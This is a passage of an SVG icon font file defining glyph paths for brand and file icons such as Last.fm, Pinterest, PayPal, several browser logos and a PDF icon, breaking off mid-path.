<glyph unicode="&#xef17;" glyph-name="lastfm" d="M451.6 193.8l-37.6 102c0 0-61-68-152.4-68-81 0-138.4 70.4-138.4 183 0 144.2 72.8 195.8 144.2 195.8 103.2 0 136-66.8 164.2-152.4l37.6-117.2c37.6-113.8 108-205.2 310.8-205.2 145.4 0 244 44.6 244 161.8 0 95-54 144.2-154.8 167.8l-75 16.4c-51.6 11.8-66.8 32.8-66.8 68 0 39.8 31.6 63.4 83.2 63.4 56.4 0 86.8-21.2 91.4-71.6l117.2 14c-9.4 105.6-82.2 149-201.8 149-105.6 0-208.8-39.8-208.8-167.8 0-79.8 38.8-130.2 136-153.6l79.8-18.8c59.8-14 79.8-38.8 79.8-72.8 0-43.4-42.2-61-122-61-118.4 0-167.8 62.2-195.8 147.8l-38.8 117.2c-49 152.6-127.6 208.8-283.6 208.8-172.4 0-264-109-264-294.4 0-178.2 91.4-274.4 255.8-274.4 132.4 0 195.8 62.2 195.8 62.2v0z" />
<glyph unicode="&#xef18;" glyph-name="lastfm2" d="M928 960h-832c-52.8 0-96-43.2-96-96v-832c0-52.8 43.2-96 96-96h832c52.8 0 96 43.2 96 96v832c0 52.8-43.2 96-96 96zM746.6 199.2c-177.6 0-239.2 80-272 179.6l-32.8 102.6c-24.6 75-53.4 133.4-143.6 133.4-62.6 0-126.2-45.2-126.2-171.4 0-98.6 50.2-160.2 121.2-160.2 80 0 133.4 59.6 133.4 59.6l32.8-89.2c0 0-55.4-54.4-171.4-54.4-144 0-224 84-224 240 0 162.2 80 257.6 231 257.6 136.6 0 205.2-49.2 248.4-182.6l33.8-102.6c24.6-75 67.8-129.4 171.4-129.4 69.8 0 106.8 15.4 106.8 53.4 0 29.8-17.4 51.4-69.8 63.6l-69.8 16.4c-85.2 20.6-119 64.6-119 134.4 0 111.8 90.4 146.8 182.6 146.8 104.6 0 168.4-38 176.6-130.4l-102.6-12.4c-4.2 44.2-30.8 62.6-80 62.6-45.2 0-72.8-20.6-72.8-55.4 0-30.8 13.4-49.2 58.4-59.6l65.6-14.4c88.2-20.6 135.4-63.6 135.4-146.8 0-102.2-86.2-141.2-213.4-141.2z" />
<glyph unicode="&#xef19;" glyph-name="delicious" d="M0 960v-1024h1024v1024h-1024zM512 0v448h-448v448h448v-448h448v-448h-448z" />
<glyph unicode="&#xef1a;" glyph-name="stumbleupon" d="M512 640c-35.2 0-64-28.8-64-64v-256c0-105.8-86.2-192-192-192s-192 86.2-192 192v128h128v-128c0-35.2 28.8-64 64-64s64 28.8 64 64v256c0 105.8 86.2 192 192 192s192-86.2 192-178v-62l-82-24-46 24v62c0 21.2-28.8 50-64 50zM960 320c0-105.8-86.2-192-192-192s-192 86.2-192 206v124l46-24 82 24v-124c0-49.2 28.8-78 64-78s64 28.8 64 64v128h128v-128z" />
<glyph unicode="&#xef1b;" glyph-name="stumbleupon2" d="M852 960h-680c-94.6 0-172-77.4-172-172v-680c0-94.6 77.4-172 172-172h680c94.6 0 172 77.4 172 172v680c0 94.6-77.4 172-172 172zM512 640c-35.29 0-64-28.71-64-64v-256c0-105.872-86.13-192-192-192s-192 86.128-192 192v128h128v-128c0-35.29 28.71-64 64-64s64 28.71 64 64v256c0 105.87 86.13 192 192 192s192-86.13 192-178v-62l-82-24-46 24v62c0 21.29-28.71 50-64 50zM960 320c0-105.872-86.13-192-192-192s-192 86.128-192 206v124l46-24 82 24v-124c0-49.29 28.71-78 64-78s64 28.71 64 64v128h128v-128z" />
<glyph unicode="&#xef1c;" glyph-name="stackoverflow" d="M1024 320v-384h-1024v384h128v-256h768v256zM192 256h640v-128h-640zM207.152 394.534l27.698 124.964 624.832-138.496-27.698-124.964zM279.658 651.442l54.092 116.006 580.032-270.464-54.092-116.006zM991.722 598.524l-77.922-101.55-507.746 389.608 56.336 73.418h58.244z" />
<glyph unicode="&#xef1d;" glyph-name="pinterest" d="M512 891.6c-245 0-443.6-198.6-443.6-443.6 0-188 117-348.4 282-413-3.8 35-7.4 89 1.6 127.2 8 34.6 52 220.4 52 220.4s-13.2 26.6-13.2 65.8c0 61.6 35.8 107.8 80.2 107.8 37.8 0 56.2-28.4 56.2-62.4 0-38-24.2-95-36.8-147.6-10.6-44.2 22-80.2 65.6-80.2 78.8 0 139.4 83.2 139.4 203.2 0 106.2-76.4 180.4-185.2 180.4-126.2 0-200.2-94.6-200.2-192.6 0-38.2 14.6-79 33-101.2 3.6-4.4 4.2-8.2 3-12.8-3.4-14-10.8-44.2-12.4-50.4-2-8.2-6.4-9.8-14.8-6-55.4 25.8-90 106.8-90 171.8 0 140 101.6 268.4 293 268.4 153.8 0 273.4-109.6 273.4-256.2 0-152.8-96.4-276-230.2-276-45 0-87.2 23.4-101.6 51 0 0-22.2-84.6-27.6-105.4-10-38.6-37-86.8-55.2-116.2 41.6-12.8 85.6-19.8 131.4-19.8 245 0 443.6 198.6 443.6 443.6 0 245.2-198.6 443.8-443.6 443.8z" />
<glyph unicode="&#xef1e;" glyph-name="pinterest2" d="M512 960c-282.4 0-512-229.6-512-512s229.6-512 512-512 512 229.6 512 512-229.6 512-512 512zM512 4.4c-45.8 0-89.8 7-131.4 19.8 18 29.4 45.2 77.8 55.2 116.2 5.4 20.8 27.6 105.4 27.6 105.4 14.4-27.6 56.8-51 101.6-51 133.8 0 230.2 123 230.2 276 0 146.6-119.6 256.2-273.4 256.2-191.4 0-293-128.6-293-268.4 0-65 34.6-146 90-171.8 8.4-4 12.8-2.2 14.8 6 1.4 6.2 9 36.2 12.4 50.4 1 4.4 0.6 8.4-3 12.8-18.4 22.2-33 63.2-33 101.2 0 97.8 74 192.6 200.2 192.6 109 0 185.2-74.2 185.2-180.4 0-120-60.6-203.2-139.4-203.2-43.6 0-76.2 36-65.6 80.2 12.6 52.8 36.8 109.6 36.8 147.6 0 34-18.2 62.4-56.2 62.4-44.6 0-80.2-46-80.2-107.8 0-39.2 13.2-65.8 13.2-65.8s-44-185.8-52-220.4c-9-38.4-5.4-92.2-1.6-127.2-165 64.4-282 224.8-282 412.8 0 245 198.6 443.6 443.6 443.6s443.6-198.6 443.6-443.6c0-245-198.6-443.6-443.6-443.6z" />
<glyph unicode="&#xef1f;" glyph-name="xing" d="M928 960h-832c-52.8 0-96-43.2-96-96v-832c0-52.8 43.2-96 96-96h832c52.8 0 96 43.2 96 96v832c0 52.8-43.2 96-96 96zM312.6 294h-110.6c-6.6 0-11.6 3-14.4 7.6-3 4.8-3 10.8 0 17l117.6 207.6c0.2 0.2 0.2 0.4 0 0.6l-74.8 129.6c-3 6.2-3.6 12.2-0.6 17 2.8 4.6 8.4 7 15.2 7h110.8c17 0 25.4-11 30.8-20.8 0 0 75.6-132 76.2-132.8-4.4-8-119.6-211.4-119.6-211.4-6-10.4-14-21.4-30.6-21.4zM836.4 807.8l-245.2-433.6c-0.2-0.2-0.2-0.6 0-0.8l156.2-285.2c3-6.2 3.2-12.4 0.2-17.2-2.8-4.6-8-7-14.8-7h-110.6c-17 0-25.4 11.2-31 21 0 0-157 288-157.4 288.8 7.8 13.8 246.4 437 246.4 437 6 10.6 13.2 21 29.6 21h112.2c6.6 0 12-2.6 14.8-7 2.8-4.6 2.8-10.8-0.4-17z" />
<glyph unicode="&#xef20;" glyph-name="xing2" d="M155.6 757.8c-8.8 0-16.4-3.2-20.2-9.2-3.8-6.4-3.2-14.4 0.8-22.6l99.8-172.8c0.2-0.4 0.2-0.6 0-0.8l-156.8-277.2c-4-8.2-3.8-16.4 0-22.6 3.8-6 10.4-10 19.2-10h147.6c22 0 32.8 15 40.2 28.6 0 0 153.4 271.4 159.4 282-0.6 1-101.6 177-101.6 177-7.4 13-18.4 27.6-41.2 27.6h-147.2zM776 960c-22 0-31.6-13.8-39.6-28.2 0 0-318.2-564.2-328.6-582.8 0.6-1 209.8-385 209.8-385 7.4-13 18.6-28.2 41.2-28.2h147.6c8.8 0 15.8 3.4 19.6 9.4 4 6.4 3.8 14.6-0.4 22.8l-208 380.6c-0.2 0.4-0.2 0.6 0 1l327 578.2c4 8.2 4.2 16.4 0.4 22.8-3.8 6-10.8 9.4-19.6 9.4h-149.4z" />
<glyph unicode="&#xef21;" glyph-name="flattr" d="M367.562 960c-243.358 0-367.562-140.162-367.562-401.856v0-549.034l238.39 238.628v278.896c0 108.416 28.73 177.406 125.118 192.894v0c33.672 6.584 103.75 4.278 148.306 4.278v0-165.596c0-1.51 0.208-4.206 0.594-5.586v0c1.87-6.704 7.93-11.616 15.116-11.63v0c4.062-0.008 7.868 2.104 11.79 5.97v0l413.122 412.974-584.874 0.062zM785.61 648.254v-278.89c0-108.414-28.736-177.414-125.116-192.894v0c-33.672-6.582-103.756-4.278-148.312-4.278v0 165.594c0 1.5-0.206 4.204-0.594 5.582v0c-1.864 6.712-7.922 11.622-15.112 11.63v0c-4.064 0.008-7.866-2.112-11.79-5.966v0l-413.124-412.966 584.874-0.066c243.354 0 367.564 140.168 367.564 401.852v0 549.028l-238.39-238.626z" />
<glyph unicode="&#xef22;" glyph-name="foursquare" d="M851.564 869.91c-12.060 16.404-31.204 26.090-51.564 26.090h-608c-35.346 0-64-28.654-64-64v-768c0-25.884 15.592-49.222 39.508-59.128 7.918-3.28 16.234-4.874 24.478-4.874 16.656 0 33.026 6.504 45.268 18.748l237.256 237.254h165.49c27.992 0 52.736 18.192 61.086 44.91l160 512c6.074 19.432 2.538 40.596-9.522 57zM672.948 640h-224.948c-35.346 0-64-28.654-64-64s28.654-64 64-64h184.948l-40-128h-144.948c-16.974 0-33.252-6.742-45.254-18.746l-146.746-146.744v549.49h456.948l-40-128z" />
<glyph unicode="&#xef23;" glyph-name="yelp" d="M608.876 306.532c-17.282-17.426-2.668-49.128-2.668-49.128l130.090-217.218c0 0 21.36-28.64 39.864-28.64 18.59 0 36.954 15.27 36.954 15.27l102.844 147.008c0 0 10.36 18.546 10.598 34.792 0.372 23.106-34.454 29.434-34.454 29.434l-243.488 78.192c-0.002-0.004-23.858 6.328-39.74-9.71zM596.532 416.016c12.46-21.128 46.828-14.972 46.828-14.972l242.938 71.006c0 0 33.106 13.466 37.832 31.418 4.64 17.954-5.46 39.622-5.46 39.622l-116.098 136.752c0 0-10.062 17.292-30.938 19.032-23.016 1.958-37.18-25.898-37.18-25.898l-137.27-216.010c0-0.004-12.134-21.516-0.652-40.95zM481.754 500.232c28.608 7.044 33.148 48.604 33.148 48.604l-1.944 345.87c0 0-4.314 42.666-23.486 54.232-30.070 18.242-38.982 8.718-47.596 7.444l-201.696-74.944c0 0-19.754-6.536-30.042-23.018-14.69-23.352 14.928-57.544 14.928-57.544l209.644-285.756c0 0 20.69-21.396 47.044-14.888zM431.944 360.262c0.722 26.676-32.030 42.7-32.030 42.7l-216.796 109.524c0 0-32.126 13.246-47.722 4.016-11.95-7.060-22.536-19.84-23.572-31.134l-14.12-173.812c0 0-2.116-30.114 5.69-43.82 11.054-19.442 47.428-5.902 47.428-5.902l253.096 55.942c9.832 6.61 27.074 7.204 28.026 42.486zM494.88 266.458c-21.726 11.156-47.724-11.95-47.724-11.95l-169.468-186.566c0 0-21.144-28.528-15.768-46.050 5.066-16.418 13.454-24.578 25.318-30.328l170.192-53.726c0 0 20.634-4.286 36.258 0.242 22.18 6.43 18.094 41.152 18.094 41.152l3.848 252.602c-0.002-0.002-0.868 24.334-20.75 34.624z" />
<glyph unicode="&#xef24;" glyph-name="paypal" d="M930 651.4c-47.8-212.2-195.4-324.2-428-324.2h-77.4l-53.8-341.6h-64.8l-3.4-22c-2.2-14.6 9-27.6 23.6-27.6h165.6c19.6 0 36.2 14.2 39.4 33.6l1.6 8.4 31.2 197.8 2 10.8c3 19.4 19.8 33.6 39.4 33.6h24.6c160.4 0 286 65.2 322.8 253.6 13.8 71.6 8.6 132.4-22.8 177.6zM831 882.8c-47.4 54-133.2 77.2-242.8 77.2h-318.2c-22.4 0-41.6-16.2-45-38.4l-132.6-840.4c-2.6-16.6 10.2-31.6 27-31.6h196.6l49.4 313-1.6-9.8c3.4 22.2 22.4 38.4 44.8 38.4h93.4c183.4 0 327 74.4 369 290 1.2 6.4 2.4 12.6 3.2 18.6 12.4 79.6 0 134-43.2 183z" />
<glyph unicode="&#xef25;" glyph-name="chrome" d="M258.278 513.458l-146.532 253.802c93.818 117.464 238.234 192.74 400.254 192.74 187.432 0 351.31-100.736 440.532-251h-417.77c-7.504 0.65-15.092 1-22.762 1-121.874 0-224.578-83.644-253.722-196.542zM695.306 635h293.46c22.74-57.93 35.234-121.004 35.234-187 0-280.826-226.1-508.804-506.186-511.926l209.394 362.678c29.48 42.378 46.792 93.826 46.792 149.248 0 73.17-30.164 139.42-78.694 187zM326 448c0 102.56 83.44 186 186 186s186-83.44 186-186c0-102.56-83.44-186-186-186s-186 83.44-186 186zM582.182 195.558l-146.578-253.878c-246.532 36.884-435.604 249.516-435.604 506.32 0 91.218 23.884 176.846 65.696 251.024l209.030-362.054c41.868-89.112 132.476-150.97 237.274-150.97 24.3 0 47.836 3.34 70.182 9.558z" />
<glyph unicode="&#xef26;" glyph-name="firefox" d="M1022.526 625.86l-11.86-76.080c0 0-16.954 140.856-37.732 193.514-31.846 80.688-46.014 80.040-46.108 79.922 21.33-54.204 17.462-83.324 17.462-83.324s-37.792 102.998-137.712 135.768c-110.686 36.282-170.57 26.364-177.488 24.486-1.050 0.008-2.064 0.010-3.030 0.010 0.818-0.062 1.612-0.146 2.426-0.212-0.034-0.020-0.090-0.042-0.082-0.052 0.45-0.548 122.306-21.302 143.916-50.996 0 0-51.76 0-103.272-14.842-2.328-0.666 189.524-23.964 228.746-215.674 0 0-21.030 43.876-47.040 51.328 17.106-52.036 12.714-150.776-3.576-199.85-2.096-6.312-4.24 27.282-36.328 41.75 10.28-73.646-0.616-190.456-51.708-222.632-3.982-2.504 32.030 115.31 7.242 69.762-142.708-218.802-311.404-100.972-387.248-49.11 38.866-8.462 112.654 1.318 145.314 25.612 0.042 0.030 0.078 0.056 0.118 0.086 35.468 24.252 56.472 41.964 75.334 37.772 18.874-4.214 31.438 14.726 16.78 31.53-14.676 16.838-50.314 39.978-98.524 27.366-34-8.904-76.134-46.522-140.448-8.432-49.364 29.25-54.012 53.546-54.45 70.376 1.218 5.966 2.754 11.536 4.576 16.624 5.682 15.87 22.912 20.658 32.494 24.438 16.256-2.792 30.262-7.862 44.968-15.406 0.19 4.894 0.252 11.39-0.018 18.76 1.41 2.802 0.538 11.252-1.722 21.58-1.302 10.308-3.42 20.974-6.752 30.692 0.012 0.002 0.020 0.010 0.030 0.014 0.056 0.018 0.108 0.040 0.156 0.070 0.078 0.044 0.146 0.112 0.208 0.19 0.012 0.020 0.030 0.034 0.044 0.052 0.082 0.124 0.154 0.272 0.198 0.466 1.020 4.618 12.022 13.524 25.718 23.1 12.272 8.58 26.702 17.696 38.068 24.752 10.060 6.248 17.72 10.882 19.346 12.098 0.618 0.466 1.358 1.012 2.164 1.636 0.15 0.116 0.3 0.232 0.454 0.354 0.094 0.074 0.19 0.148 0.286 0.226 5.41 4.308 13.484 12.448 15.178 29.578 0.004 0.042 0.010 0.080 0.012 0.122 0.050 0.504 0.092 1.014 0.13 1.534 0.028 0.362 0.050 0.726 0.072 1.096 0.014 0.284 0.032 0.566 0.044 0.856 0.030 0.674 0.050 1.364 0.060 2.064 0 0.040 0.002 0.076 0.004 0.116 0.022 1.658-0.006 3.386-0.104 5.202-0.054 1.014-0.126 1.93-0.298 2.762-0.008 0.044-0.018 0.092-0.028 0.136-0.018 0.082-0.036 0.164-0.058 0.244-0.036 0.146-0.076 0.292-0.122 0.43-0.006 0.018-0.010 0.032-0.016 0.046-0.052 0.16-0.112 0.314-0.174 0.464-0.004 0.006-0.004 0.010-0.006 0.016-1.754 4.108-8.32 5.658-35.442 6.118-0.026 0.002-0.050 0.002-0.076 0.002v0c-11.066 0.188-25.538 0.194-44.502 0.118-33.25-0.134-51.628 32.504-57.494 45.132 8.040 44.46 31.276 76.142 69.45 97.626 0.722 0.406 0.58 0.742-0.274 0.978 7.464 4.514-90.246 0.124-135.186-57.036-39.888 9.914-74.654 9.246-104.616 2.214-5.754 0.162-12.924 0.88-21.434 2.652-19.924 18.056-48.448 51.402-49.976 91.208 0 0-0.092-0.072-0.252-0.204-0.020 0.382-0.056 0.76-0.072 1.142 0 0-60.716-46.664-51.628-173.882-0.022-2.036-0.064-3.986-0.12-5.874-16.432-22.288-24.586-41.020-25.192-45.156-14.56-29.644-29.334-74.254-41.356-141.98 0 0 8.408 26.666 25.284 56.866-12.412-38.022-22.164-97.156-16.436-185.856 0 0 1.514 19.666 6.874 47.994 4.186-55.010 22.518-122.924 68.858-202.788 88.948-153.32 225.67-230.74 376.792-242.616 26.836-2.212 54.050-2.264 81.424-0.186 2.516 0.178 5.032 0.364 7.55 0.574 30.964 2.174 62.134 6.852 93.238 14.366 425.172 102.798 378.942 616.198 378.942 616.198z" />
<glyph unicode="&#xef27;" glyph-name="IE" d="M734.202 331.17h236.050c1.82 16.37 2.548 33.098 2.548 50.196 0 80.224-21.534 155.468-59.124 220.266 38.88 103.308 37.492 190.988-14.556 243.39-49.496 49.28-182.29 41.28-332.412-25.198-11.104 0.84-22.318 1.272-33.638 1.272-206.048 0-378.926-141.794-426.708-332.85 64.638 82.754 132.638 142.754 223.478 186.448-8.26-7.74-56.454-55.652-64.56-63.764-239.548-239.478-315.090-552.306-233.806-633.604 61.786-61.774 173.758-51.342 302.376 11.648 59.806-30.458 127.5-47.63 199.218-47.63 193.134 0 356.804 124.316 416.090 297.448h-237.868c-32.734-60.382-96.748-101.48-170.218-101.48-73.468 0-137.484 41.098-170.216 101.48-14.55 27.274-22.914 58.554-22.914 91.656v0.722h386.26zM348.302 447.196c5.456 97.11 86.2 174.584 184.766 174.584s179.312-77.472 184.766-174.584h-369.532zM896.966 796.192c33.526-33.88 32.688-96.214 4.012-174.022-49.136 74.908-120.518 133.936-204.792 167.64 90.106 38.638 163.406 43.756 200.78 6.382zM93.482-7.256c-42.782 42.796-29.884 132.618 25.23 240.832 34.308-96.27 101.156-177.090 187.336-229.154-95.43-43.318-173.536-50.674-212.566-11.678z" />
<glyph unicode="&#xef28;" glyph-name="edge" d="M15.4 505.4c30 236.8 191.6 451.6 481.2 454.6 174.8-3.4 318.6-82.6 404.2-233.6 43-78.8 56.4-161.6 59.2-253v-107.4h-642.6c3-265 390-256 556.6-139.2v-215.8c-97.6-58.6-319-111-490.4-43.6-146 54.8-250 207.6-249.4 354.6-4.8 190.6 94.8 316.8 249.4 388.6-32.8-40.6-57.8-85.4-70.8-163h362.8c0 0 21.2 216.8-205.4 216.8-213.6-7.4-367.6-131.6-454.8-259v0z" />
<glyph unicode="&#xef29;" glyph-name="safari" d="M512 960c-282.8 0-512-229.2-512-512s229.2-512 512-512 512 229.2 512 512-229.2 512-512 512zM958.4 487.2l-1 10.6c0.2-3.6 0.6-7 1-10.6zM888.4 691.2l-7.2 10.8c2.4-3.6 4.8-7.2 7.2-10.8zM860.6 729.4l-4.4 5.4c1.6-1.8 3-3.6 4.4-5.4zM798.6 792.4l-5.4 4.4c2-1.6 3.6-3 5.4-4.4zM766 817.2l-10.8 7.2c3.6-2.4 7.2-4.8 10.8-7.2zM561.8 893.2l-10.8 1c3.6-0.2 7.2-0.6 10.8-1zM472.8 894.4l-10.8-1c3.6 0.2 7.2 0.6 10.8 1zM268.8 824.4l-10.8-7.2c3.6 2.4 7.2 4.8 10.8 7.2zM230.6 796.6l-5.2-4.2c1.8 1.4 3.4 2.8 5.2 4.2zM167.6 734.6l-4.4-5.4c1.6 1.8 3 3.6 4.4 5.4zM142.8 702l-7.2-10.8c2.4 3.6 4.8 7.2 7.2 10.8zM66.8 497.8l-1-10.8c0.2 3.6 0.6 7.2 1 10.8zM65.6 408.8l1-10.8c-0.2 3.6-0.6 7.2-1 10.8zM135.6 205l7.2-10.8c-2.4 3.4-4.8 7-7.2 10.8zM144 192.4l79.8 53.4-8.8 13.4-79.8-53.4c-36.2 56.2-60 120.8-68 190.4l47.8 4.8-1.6 16-47.8-4.8c-0.8 9.2-1.2 18.6-1.4 28h96v16h-96c0.2 9.4 0.6 18.6 1.4 28l47.8-4.6 1.6 16-47.8 4.6c8 69.6 32 134.2 68.2 190.4l79.8-53.4 8.8 13.4-80 53c5.4 7.6 10.8 15.2 16.6 22.4l37-30.4 10.2 12.4-37 30.4c6 7.2 12.4 14 18.8 20.8l67.8-67.8 11.4 11.4-67.8 67.8c6.8 6.4 13.6 12.8 20.6 18.8l30.4-37.2 12.4 10.2-30.4 37c7.4 5.8 14.8 11.4 22.4 16.8l53.4-79.8 13.4 8.8-53.4 79.8c56.2 36.2 120.8 60 190.4 68l4.8-47.8 16 1.6-4.8 47.8c9.2 0.8 18.6 1.2 28 1.4v-96h16v96c9.4-0.2 18.6-0.6 28-1.4l-4.6-47.8 16-1.6 4.6 47.8c69.6-8 134.2-32 190.4-68.2l-53.4-79.8 13.4-8.8 53.4 79.8c7.6-5.4 15.2-10.8 22.4-16.6l-30.4-37 12.4-10.2 30.4 37c7.2-6 14-12.4 20.8-18.8l-25.6-25-350-233.4-233.4-350-25-25c-6.4 6.8-12.8 13.6-18.8 20.6l37 30.4-10.2 12.4-37-30.4c-5.8 7.2-11.2 14.8-16.6 22.4zM167.6 161.4c-1.4 1.8-2.8 3.4-4.2 5.2l4.2-5.2zM225.4 103.6l5.2-4.2c-1.8 1.4-3.4 2.8-5.2 4.2zM258 79l10.8-7.2c-3.6 2.2-7.2 4.6-10.8 7.2zM462.2 2.8l10.8-1c-3.6 0.2-7.2 0.6-10.8 1zM551.2 1.6l10.6 1c-3.6-0.2-7-0.6-10.6-1zM755.2 71.6l10.8 7.2c-3.6-2.4-7.2-4.8-10.8-7.2zM793.4 99.4l5.4 4.4c-1.8-1.6-3.6-3-5.4-4.4zM828.4 130.8l0.8 0.8c-0.2-0.2-0.6-0.6-0.8-0.8zM856.4 161.4l4.4 5.4c-1.6-1.8-3-3.6-4.4-5.4zM863.4 170l-37 30.4-10.2-12.4 37-30.4c-6-7.2-12.4-14-18.8-20.8l-67.8 67.8-11.4-11.4 67.8-67.8c-6.8-6.4-13.6-12.8-20.6-18.8l-30.4 37.2-12.4-10.2 30.4-37c-7.4-5.8-14.8-11.4-22.4-16.8l-53.4 79.8-13.4-8.8 53.4-79.8c-56.2-36.2-120.8-60-190.4-68l-4.8 47.8-16-1.6 4.8-47.8c-9.2-0.8-18.6-1.2-28-1.4v96h-16v-96c-9.4 0.2-18.6 0.6-28 1.4l4.6 47.8-16 1.6-4.6-47.8c-69.6 8-134.2 32-190.4 68.2l53.4 79.8-13.4 8.8-53-79.8c-7.6 5.4-15.2 10.8-22.4 16.6l30.4 37-12.4 10.2-30.4-37c-7.2 6-14 12.4-20.8 18.8l25.2 25 350 233.4 233.4 350 25 25c6.4-6.8 12.8-13.6 18.8-20.6l-37-30.4 10.2-12.4 37 30.4c5.8-7.4 11.4-14.8 16.8-22.4l-79.8-53.4 8.8-13.4 79.8 53.4c36.2-56.2 60-120.8 68-190.4l-47.8-4.8 1.6-16 47.8 4.8c0.8-9.2 1.2-18.6 1.4-28h-96v-16h96c-0.2-9.4-0.6-18.6-1.4-28l-47.8 4.6-1.6-16 47.8-4.6c-8-69.6-32-134.2-68.2-190.4l-79.8 53.4-8.8-13.4 79.8-53.4c-5.2-7.2-10.8-14.6-16.6-22zM958.4 409c-0.4-3.6-0.6-7.2-1-10.8l1 10.8zM888.4 204.8c-2.4-3.6-4.8-7.2-7.2-10.8l7.2 10.8zM432.535 888.925l18.73-94.157-15.693-3.122-18.73 94.157 15.693 3.122zM591.656 7.050l-18.73 94.157 15.693 3.122 18.73-94.157-15.693-3.122zM389.628 879.11l13.939-45.931-15.31-4.646-13.939 45.931 15.31 4.646zM634.434 17.113l-13.939 45.931 15.31 4.646 13.939-45.931-15.31-4.646zM348.014 864.901l36.739-88.694-14.782-6.123-36.739 88.694 14.782 6.123zM676.123 31.035l-36.739 88.694 14.782 6.123 36.739-88.694-14.782-6.123zM293.62 839.341l14.11 7.544 22.632-42.331-14.11-7.544-22.632 42.331zM730.101 56.711l-14.11-7.544-22.632 42.331 14.11 7.544 22.632-42.331zM120.601 666.174l42.336-22.622-7.541-14.112-42.336 22.622 7.541 14.112zM903.244 229.805l-42.336 22.622 7.541 14.112 42.336-22.622-7.541-14.112zM183.811 575.377l-88.694 36.739 6.123 14.782 88.694-36.739-6.123-14.782zM840.32 320.699l88.694-36.739-6.123-14.782-88.694 36.739 6.123 14.782zM85.543 585.613l45.936-13.93-4.643-15.312-45.936 13.93 4.643 15.312zM938.308 310.333l-45.936 13.93 4.643 15.312 45.936-13.93-4.643-15.312zM74.069 543.218l94.157-18.73-3.122-15.693-94.157 18.73 3.122 15.693zM949.741 352.757l-94.157 18.73 3.122 15.693 94.157-18.73-3.122-15.693zM70.965 368.452l94.157 18.73 3.122-15.693-94.157-18.73-3.122 15.693zM952.842 527.573l-94.157-18.73-3.122 15.693 94.157 18.73 3.122-15.693zM80.974 325.486l45.931 13.939 4.646-15.31-45.931-13.939-4.646 15.31zM942.969 570.293l-45.931-13.939-4.646 15.31 45.931 13.939 4.646-15.31zM101.142 269.088l-6.123 14.782 88.694 36.739 6.123-14.782-88.694-36.739zM922.794 626.769l6.122-14.782-88.694-36.73-6.122 14.782 88.694 36.73zM120.824 229.733l-7.544 14.11 42.331 22.632 7.544-14.11-42.331-22.632zM903.455 666.215l7.544-14.11-42.331-22.632-7.544 14.11 42.331 22.632zM307.878 49.154l-14.11 7.542 22.627 42.331 14.11-7.542-22.627-42.331zM716.073 846.926l14.112-7.541-22.622-42.336-14.112 7.541 22.622 42.336zM333.267 37.201l36.739 88.694 14.782-6.123-36.739-88.694-14.782 6.123zM690.884 858.89l-36.739-88.694-14.782 6.123 36.739 88.694 14.782-6.123zM389.634 16.972l-15.31 4.645 13.934 45.931 15.31-4.645-13.934-45.931zM634.349 879.118l15.312-4.642-13.925-45.936-15.312 4.642 13.925 45.936zM432.472 7.161l-15.693 3.122 18.73 94.157 15.693-3.122-18.73-94.157zM591.536 889.031l15.693-3.122-18.73-94.157-15.693 3.122 18.73 94.157z" />
<glyph unicode="&#xef2a;" glyph-name="opera" d="M1024 448v0 0c0-151.6-66-288-170.8-381.6-131.4-64-253.8-19.2-294.2 8.8 129 28.2 226.4 184.2 226.4 372.8s-97.4 344.6-226.4 373c40.6 28 163 72.8 294.2 8.8 104.8-93.8 170.8-230.2 170.8-381.8v0 0zM343.4 736.6c-56.6-66.8-93.2-165.6-95.6-276.6 0-0.2 0-23.8 0-24.2 2.4-110.8 39.2-209.6 95.8-276.4 73.4-95.4 182.6-155.8 304.6-155.8 75 0 145.2 22.8 205.2 62.6-90.8-81-210.4-130.2-341.4-130.2-8.2 0-16.4 0.2-24.4 0.6-271.4 12.8-487.6 236.8-487.6 511.4 0 282.8 229.2 512 512 512 0.6 0 1.2 0 2 0 130.4-0.4 249.2-49.6 339.4-130.4-60 39.8-130.2 62.8-205.2 62.8-122 0-231.2-60.4-304.8-155.8z" />
<glyph unicode="&#xef2b;" glyph-name="file-pdf" d="M842.012 370.52c-13.648 13.446-43.914 20.566-89.972 21.172-31.178 0.344-68.702-2.402-108.17-7.928-17.674 10.198-35.892 21.294-50.188 34.658-38.462 35.916-70.568 85.772-90.576 140.594 1.304 5.12 2.414 9.62 3.448 14.212 0 0 21.666 123.060 15.932 164.666-0.792 5.706-1.276 7.362-2.808 11.796l-1.882 4.834c-5.894 13.592-17.448 27.994-35.564 27.208l-10.916 0.344c-20.202 0-36.664-10.332-40.986-25.774-13.138-48.434 0.418-120.892 24.98-214.738l-6.288-15.286c-17.588-42.876-39.63-86.060-59.078-124.158l-2.528-4.954c-20.46-40.040-39.026-74.028-55.856-102.822l-17.376-9.188c-1.264-0.668-31.044-16.418-38.028-20.644-59.256-35.38-98.524-75.542-105.038-107.416-2.072-10.17-0.53-23.186 10.014-29.212l16.806-8.458c7.292-3.652 14.978-5.502 22.854-5.502 42.206 0 91.202 52.572 158.698 170.366 77.93 25.37 166.652 46.458 244.412 58.090 59.258-33.368 132.142-56.544 178.142-56.544 8.168 0 15.212 0.78 20.932 2.294 8.822 2.336 16.258 7.368 20.792 14.194 8.926 13.432 10.734 31.932 8.312 50.876-0.72 5.622-5.21 12.574-10.068 17.32zM211.646 145.952c7.698 21.042 38.16 62.644 83.206 99.556 2.832 2.296 9.808 8.832 16.194 14.902-47.104-75.124-78.648-105.066-99.4-114.458zM478.434 760.314c13.566 0 21.284-34.194 21.924-66.254s-6.858-54.56-16.158-71.208c-7.702 24.648-11.426 63.5-11.426 88.904 0 0-0.566 48.558 5.66 48.558v0zM398.852 322.506c9.45 16.916 19.282 34.756 29.33 53.678 24.492 46.316 39.958 82.556 51.478 112.346 22.91-41.684 51.444-77.12 84.984-105.512 4.186-3.542 8.62-7.102 13.276-10.65-68.21-13.496-127.164-29.91-179.068-49.862v0zM828.902 326.348c-4.152-2.598-16.052-4.1-23.708-4.1-24.708 0-55.272 11.294-98.126 29.666 16.468 1.218 31.562 1.838 45.102 1.838 24.782 0 32.12 0.108 56.35-6.072 24.228-6.18 24.538-18.734 20.382-21.332v0zM917.806 730.924c-22.21 30.292-53.174 65.7-87.178 99.704s-69.412 64.964-99.704 87.178c-51.574 37.82-76.592 42.194-90.924 42.194h-496c-44.112 0-80-35.888-80-80v-864c0-44.112 35.886-80 80-80h736c44.112 0 80 35.888 80 80v624c0 14.332-4.372 39.35-42.194 90.924v0zM785.374 785.374c30.7-30.7 54.8-58.398 72.58-81.374h-153.954v153.946c22.982-17.78 50.678-41.878 81.374-72.572v0zM896 16c0-8.672-7.328-16-16-16h-736c-8.672 0-16 7.328-16 16v864c0 8.672 